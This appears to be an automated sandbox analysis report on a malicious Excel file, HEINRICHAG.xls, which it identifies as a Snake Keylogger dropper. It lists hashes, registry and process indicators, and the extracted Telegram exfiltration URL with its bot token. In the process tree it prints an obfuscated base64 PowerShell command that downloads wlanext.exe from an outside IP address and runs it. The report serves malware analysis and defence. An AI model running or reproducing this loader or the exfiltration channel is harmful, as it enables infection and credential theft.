Analysis
-
max time kernel
121s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
22-10-2024 14:07
Static task
static1
Behavioral task
behavioral1
Sample
HEINRICHAG.xls
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
HEINRICHAG.xls
Resource
win10v2004-20241007-en
General
-
Target
HEINRICHAG.xls
-
Size
848KB
-
MD5
5a232e6f517ecc2663439fcf2a28573d
-
SHA1
155a24515072423a751465a774fc6e3e24e21f84
-
SHA256
4af00aaa090c79876c7d3c1c337cdb5244f0b05689de4e22b7ed4a84bb8eb9d8
-
SHA512
a96e1d03f6155e30e236d4234c0c352911d3780cd59493ea8545296dc8b42c2befed3972adfbf0001df24023e522547d00bb2de68c27d729cf689487ad5b4f49
-
SSDEEP
12288:YmzHJE+CzldQD3DERnLRmF8D5JhuiC3LaQlOh4cjUVwUi4t7W:zczlWbARM8NTC3eQ0h4eU
Malware Config
Extracted
snakekeylogger
https://api.telegram.org/bot8129252196:AAFb_vUYwennKVolbwpXf3vnDfT_yhozHns/sendMessage?chat_id=7004340450
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 3 IoCs
resource yara_rule behavioral1/memory/2788-69-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/2788-71-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger behavioral1/memory/2788-70-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger -
Blocklisted process makes network request 3 IoCs
flow pid Process 10 2244 mshta.exe 11 2244 mshta.exe 13 2568 pOWeRSHEll.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 2 IoCs
pid Process 2568 pOWeRSHEll.exe 1552 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 848 wlanext.exe -
Loads dropped DLL 1 IoCs
pid Process 2568 pOWeRSHEll.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 14 checkip.dyndns.org -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000700000001a423-61.dat autoit_exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk pOWeRSHEll.exe File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 848 set thread context of 2788 848 wlanext.exe 40 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wlanext.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pOWeRSHEll.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 3044 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2568 pOWeRSHEll.exe 1552 powershell.exe 2568 pOWeRSHEll.exe 2568 pOWeRSHEll.exe 2788 RegSvcs.exe 2788 RegSvcs.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 848 wlanext.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2568 pOWeRSHEll.exe Token: SeDebugPrivilege 1552 powershell.exe Token: SeDebugPrivilege 2788 RegSvcs.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 848 wlanext.exe 848 wlanext.exe -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 848 wlanext.exe 848 wlanext.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 3044 EXCEL.EXE 3044 EXCEL.EXE 3044 EXCEL.EXE 3044 EXCEL.EXE 3044 EXCEL.EXE -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 2244 wrote to memory of 2568 2244 mshta.exe 33 PID 2244 wrote to memory of 2568 2244 mshta.exe 33 PID 2244 wrote to memory of 2568 2244 mshta.exe 33 PID 2244 wrote to memory of 2568 2244 mshta.exe 33 PID 2568 wrote to memory of 1552 2568 pOWeRSHEll.exe 35 PID 2568 wrote to memory of 1552 2568 pOWeRSHEll.exe 35 PID 2568 wrote to memory of 1552 2568 pOWeRSHEll.exe 35 PID 2568 wrote to memory of 1552 2568 pOWeRSHEll.exe 35 PID 2568 wrote to memory of 2112 2568 pOWeRSHEll.exe 36 PID 2568 wrote to memory of 2112 2568 pOWeRSHEll.exe 36 PID 2568 wrote to memory of 2112 2568 pOWeRSHEll.exe 36 PID 2568 wrote to memory of 2112 2568 pOWeRSHEll.exe 36 PID 2112 wrote to memory of 1324 2112 csc.exe 37 PID 2112 wrote to memory of 1324 2112 csc.exe 37 PID 2112 wrote to memory of 1324 2112 csc.exe 37 PID 2112 wrote to memory of 1324 2112 csc.exe 37 PID 2568 wrote to memory of 848 2568 pOWeRSHEll.exe 39 PID 2568 wrote to memory of 848 2568 pOWeRSHEll.exe 39 PID 2568 wrote to memory of 848 2568 pOWeRSHEll.exe 39 PID 2568 wrote to memory of 848 2568 pOWeRSHEll.exe 39 PID 848 wrote to memory of 2788 848 wlanext.exe 40 PID 848 wrote to memory of 2788 848 wlanext.exe 40 PID 848 wrote to memory of 2788 848 wlanext.exe 40 PID 848 wrote to memory of 2788 848 wlanext.exe 40 PID 848 wrote to memory of 2788 848 wlanext.exe 40 PID 848 wrote to memory of 2788 848 wlanext.exe 40 PID 848 wrote to memory of 2788 848 wlanext.exe 40 PID 848 wrote to memory of 2788 848 wlanext.exe 40 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\HEINRICHAG.xls1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3044
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2244 -
C:\Windows\SysWOW64\WINDowsPOweRShEll\V1.0\pOWeRSHEll.exe"C:\Windows\systEm32\WINDowsPOweRShEll\V1.0\pOWeRSHEll.exe" "poweRshELl.ExE -Ex ByPass -nOp -w 1 -c DEVICEcrEdeNTiALdEpLOymENt ; IEx($(IeX('[sysTEM.TExT.eNcODiNG]'+[CHAr]58+[cHAr]58+'utf8.GEtStrIng([sYStEM.CONVert]'+[cHaR]58+[ChAR]58+'FRoMBASE64stRiNG('+[chaR]0X22+'JHpWV21LICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlZklOaVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNb04uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVJdEd0RkxyayxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHlPaGNCWkMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnRFl3bFBXUURDLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHp1UyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFV3Z05LQ3FQWk8pOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiQ3RhaHNQek92IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUVzUEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU0hrSyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHpWV21LOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuNDUvNTYxL3dsYW5leHQuZXhlIiwiJEVuVjpBUFBEQVRBXHdsYW5leHQuZXhlIiwwLDApO3N0QVJ0LVNsRWVQKDMpO3NUQXJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXHdsYW5leHQuZXhlIg=='+[chAR]0X22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2568 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPass -nOp -w 1 -c DEVICEcrEdeNTiALdEpLOymENt3⤵
- Evasion via Device Credential Deployment
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1552
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0-q4iydx.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2112 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE715.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCE714.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:1324
-
-
-
C:\Users\Admin\AppData\Roaming\wlanext.exe"C:\Users\Admin\AppData\Roaming\wlanext.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:848 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Roaming\wlanext.exe"4⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2788
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD567e486b2f148a3fca863728242b6273e
SHA1452a84c183d7ea5b7c015b597e94af8eef66d44a
SHA256facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb
SHA512d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e
-
Filesize
436B
MD5971c514f84bba0785f80aa1c23edfd79
SHA1732acea710a87530c6b08ecdf32a110d254a54c8
SHA256f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA51243dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
Filesize174B
MD5aa6d56cb57ba30a9f2f2e20b24f23bcd
SHA1167b43ddb3ba579f666468daa58ece42016a5574
SHA2568e6cb7a9d22cceee618bd9af43efb4c3ff5160aefd0aa1f47299b8cc8ca10d73
SHA512cd98d791d7bc0a53bfeea5088cf6213de8f484b5a3cfd224e54168d03cced37eecd92cefacbb94e172a854e1c3867bc0b170dddafbc72c8a67db766de6e681fb
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
Filesize170B
MD50df954d45fbb22162c426ad327cd34ea
SHA1fbbd4a4f8ffa2c4aeeb06c54df4e8cfef2d6f99c
SHA2562140a0088cda1b8ceef890898491b09bcd04864f957dd213f00419e9f862d904
SHA5126cef8d34542ceaa5f415f6533b3f629bb75c31f476b22684619236a91db82be56237b6557903df1227100f9d8824c865c48da1896d7a80ed675a2dcc1c82051e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UQFHO95Z\seethemagicalpersoninmylifewithherlifegoodforme[1].hta
Filesize8KB
MD524dcf722096ca6d02bbb70733ae01abc
SHA1fb8166a57aaf6d4837dfb686b84ee51474941c83
SHA256e0d07f596090db80fff8fb48b11999010611ac352534fadcf295c7ac47042bdd
SHA512bb055ad22ba25be389d212fe6517b28244234d259cb0dc870eb7691b6ac3f99ed1d3a8408552f3f1fed9d29313a4a14d5a3fc3c08c629790990a8229f8ab33da
-
Filesize
3KB
MD5da33a27aa7d65bd8ee66cdaf810c5fd6
SHA1a8b43c228041cecb3ff6c4daf64124039f5fe9a7
SHA256230537ed0d737ca3fe72181ac3142f0f3a304013b0675f0aad30ec1e0d64c73f
SHA512c2983893b2a974765e45d5e60fd17ecb8e5cf4ac5483d1f534b18942afb26f88e9d20432563c8967ed7f0c68e0b61242b280f7b7167b094f59d157e3e99637a7
-
Filesize
7KB
MD567db7b5d87a408c89ce6a62747212adf
SHA1e68274b09e907e40eae1e4b0616dea0489205b92
SHA256a306a9872788fe4e29de436018e57f071c513712eb6708eb5dd905fd20ed3166
SHA51284073fd4051d076ee29aa57d66667448d71abc882d8d5fbaefba9f29c2a4e7a8a4967bafb5fc38595f9339cf22f6f370322517fac76a83f25e1d23162692d6dc
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
1KB
MD593bf7588d28319fd7f0633fd48e832fe
SHA1aaa3e81b9d3c1224d72dab9e2e991f4737b6bf50
SHA25653255559d97144c23031b0ea1000b6f690a293945c2ab560c57c161780b4e40b
SHA512ce76ab7ecac6c509383d904705468fd120119fa54dff3b958fd6f4f424aea1fb734249641d234141f20474e4eba417270aed7b414386944f8c9379545ca822d6
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5c85eaec6517f7730524b0ecef68cda4e
SHA1777ffd9c07407a6a40d662fcff2d7a68dd3a43fd
SHA256c530590b63c19c3fe796d15731b24d0b3389bbd05bd03f947a7321b621372cee
SHA512241f7ca66ed718498ed7ffda86d7b4c61a64c5f3f3df2136866a8d156db17b5015055d69f787f29b04474675d84a417ee5156578eb11cdd890ffc8cb8bb2cc9a
-
Filesize
910KB
MD5d70ae089068975f5c914ba70c40c3527
SHA1b0a81c280689f14bfa4d499955c80155e045e662
SHA2562385bc1316c82968a13b95bb465c19f7675a6d3504fc3b8c028c00d7acbdc022
SHA512532dd387f2a6757185aa6da0983d71277c2a7d9774482f27ba6d55478a7035df8b911457523569151be68e45ca6ee0e3a1f3cbff1eaab7d8126454a204532697
-
Filesize
483B
MD54c5d6a51b5bad9b89090a128b2676ef5
SHA113fbf9031d31d7c621c9fa9816818b341377d487
SHA256c849809f9d06a8ef3bbd4de89bc706fbd851231f8dfe9f8ed84800c9b67e80d7
SHA512a3f1573cee336b8efe076e8746e5a61e73d46b539cb5170f297262a5327e7b43e0c45cfe93682e93b92f20e878ae9e21e60502dbcdf492236ea642f15290601d
-
Filesize
309B
MD5af7822f52805bb6a4371cdc9612ac02d
SHA14983b9f2ac00b55ddbb7f800fab7cc82debbf7ac
SHA2567659604fd3fbb7514da9c0a6cc980c691f690b30260158544cfa0126343eb5eb
SHA51248e508112e54863f262664b459fafa3b22535114d5f42d2ad09f37e39cb60f62aef232211cdb886b382a80737e51aff606b4bce694e2a30f3c2084f970e7d92a
-
Filesize
652B
MD5f9977028147007773db092146b2c3217
SHA13d98a0cc480b041fa2e227b5466099ad49ce7034
SHA256d5d9bab9a59677b125e11b11722fb36cb380c737e9530314bf62b03ae7813e5f
SHA512f353097d255475a1879faee7db1389ee12d596efdc031df213bc4789fe39031baa33c52470581d862dd0b5516a860cd25deb994bb8a853257de0c7ee084ef1a6